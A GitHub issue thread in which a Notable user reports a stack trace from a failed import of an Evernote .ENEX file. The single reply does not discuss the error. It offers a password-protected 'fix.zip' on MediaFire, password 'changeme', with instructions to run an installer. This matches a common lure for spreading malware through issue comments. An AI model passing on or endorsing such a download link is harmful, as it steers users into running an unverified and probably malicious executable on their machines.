### ISSUE TITLE
Error report: These sources are not supported: D:\MY_NOTES_1_100.ENEX

### ISSUE THREAD

**Issue by ultraali453** [fabiospampinato/notable#1734]
- **OS Version**: win32 10.0.22000
- **Notable Version**: v1.8.4

```
Error: These sources are not supported: D:\MY_NOTES_1_100.ENEX
    at Object.dump (file:///C:/Users/Windows%20Wally/AppData/Local/Programs/notable/resources/app.asar/renderer/chunk.801f2cae377ea1944a34.js:2:201495)
    at import_Import.import (file:///C:/Users/Windows%20Wally/AppData/Local/Programs/notable/resources/app.asar/renderer/renderer.js:2:24295)
```

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
